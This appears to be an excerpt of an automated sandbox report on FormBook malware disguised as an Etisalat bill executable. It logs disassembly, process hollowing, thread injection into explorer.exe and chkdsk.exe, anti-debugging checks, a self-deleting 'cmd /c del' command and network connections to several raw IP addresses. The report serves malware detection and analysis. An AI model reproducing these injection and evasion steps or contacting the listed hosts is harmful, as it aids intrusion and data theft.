Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2CB7E mov eax, dword ptr fs:[00000030h]	2_2_03A2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE4B4B mov eax, dword ptr fs:[00000030h]	2_2_03AE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE4B4B mov eax, dword ptr fs:[00000030h]	2_2_03AE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]	2_2_03B02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]	2_2_03B02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]	2_2_03B02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]	2_2_03B02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]	2_2_03AC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]	2_2_03AC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFAB40 mov eax, dword ptr fs:[00000030h]	2_2_03AFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD8B42 mov eax, dword ptr fs:[00000030h]	2_2_03AD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28B50 mov eax, dword ptr fs:[00000030h]	2_2_03A28B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADEB50 mov eax, dword ptr fs:[00000030h]	2_2_03ADEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]	2_2_03A38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]	2_2_03A38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A86AA4 mov eax, dword ptr fs:[00000030h]	2_2_03A86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04A80 mov eax, dword ptr fs:[00000030h]	2_2_03B04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68A90 mov edx, dword ptr fs:[00000030h]	2_2_03A68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]	2_2_03A6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]	2_2_03A6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]	2_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]	2_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]	2_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30AD0 mov eax, dword ptr fs:[00000030h]	2_2_03A30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]	2_2_03A64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]	2_2_03A64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA24 mov eax, dword ptr fs:[00000030h]	2_2_03A6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5EA2E mov eax, dword ptr fs:[00000030h]	2_2_03A5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]	2_2_03A54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]	2_2_03A54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA38 mov eax, dword ptr fs:[00000030h]	2_2_03A6CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABCA11 mov eax, dword ptr fs:[00000030h]	2_2_03ABCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADEA60 mov eax, dword ptr fs:[00000030h]	2_2_03ADEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]	2_2_03AACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]	2_2_03AACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h]	2_2_03A40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h]	2_2_03A40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h]	2_2_03A309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h]	2_2_03A309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB89B3 mov esi, dword ptr fs:[00000030h]	2_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h]	2_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h]	2_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]	2_2_03ABE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h]	2_2_03A629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h]	2_2_03A629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC69C0 mov eax, dword ptr fs:[00000030h]	2_2_03AC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A649D0 mov eax, dword ptr fs:[00000030h]	2_2_03A649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]	2_2_03AFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB892A mov eax, dword ptr fs:[00000030h]	2_2_03AB892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC892B mov eax, dword ptr fs:[00000030h]	2_2_03AC892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h]	2_2_03AAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h]	2_2_03AAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABC912 mov eax, dword ptr fs:[00000030h]	2_2_03ABC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]	2_2_03A28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]	2_2_03A28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]	2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]	2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]	2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]	2_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7096E mov edx, dword ptr fs:[00000030h]	2_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]	2_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]	2_2_03AD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]	2_2_03AD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABC97C mov eax, dword ptr fs:[00000030h]	2_2_03ABC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB0946 mov eax, dword ptr fs:[00000030h]	2_2_03AB0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04940 mov eax, dword ptr fs:[00000030h]	2_2_03B04940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30887 mov eax, dword ptr fs:[00000030h]	2_2_03A30887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABC89D mov eax, dword ptr fs:[00000030h]	2_2_03ABC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]	2_2_03AFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_03A6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_03A6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]	2_2_03A5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B008C0 mov eax, dword ptr fs:[00000030h]	2_2_03B008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]	2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]	2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]	2_2_03A52835

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_00900B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00900B62

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008D2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008D2622
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008C083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008C083F
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008C09D5 SetUnhandledExceptionFilter,	0_2_008C09D5
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008C0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_008C0C21

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 213.186.33.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.116.255.220 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 76.223.105.230 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.254.39.135 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 93.179.125.252 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 1028			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Thread register set: target process: 1028			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\svchost.exe

Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: DB0000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2F55008

Jump to behavior

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

0_2_00901201

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_008E2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_008E2BA5

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_0090B226 SendInput,keybd_event,

0_2_0090B226

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_009222DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_009222DA

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

0_2_00900B62

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_00901663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00901663

Source: Etisalat Summary Bill for the Month of August.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorer.exe, 00000003.00000003.3814791778.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3808468308.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2042336516.0000000009BAD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000003.00000000.2028030600.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4487232296.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: Etisalat Summary Bill for the Month of August.exe, explorer.exe, 00000003.00000000.2028030600.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4488914677.0000000004B00000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.2028030600.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4487232296.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.2028030600.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4487232296.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.2027472063.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4486550852.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_008C0698 cpuid

0_2_008C0698

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_00918195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00918195

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_008FD27A GetUserNameW,

0_2_008FD27A

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_008DB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_008DB952

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_008A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008A42DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: Etisalat Summary Bill for the Month of August.exe	Binary or memory string: WIN_81
Source: Etisalat Summary Bill for the Month of August.exe	Binary or memory string: WIN_XP
Source: Etisalat Summary Bill for the Month of August.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Etisalat Summary Bill for the Month of August.exe	Binary or memory string: WIN_XPe
Source: Etisalat Summary Bill for the Month of August.exe	Binary or memory string: WIN_VISTA
Source: Etisalat Summary Bill for the Month of August.exe	Binary or memory string: WIN_7
Source: Etisalat Summary Bill for the Month of August.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
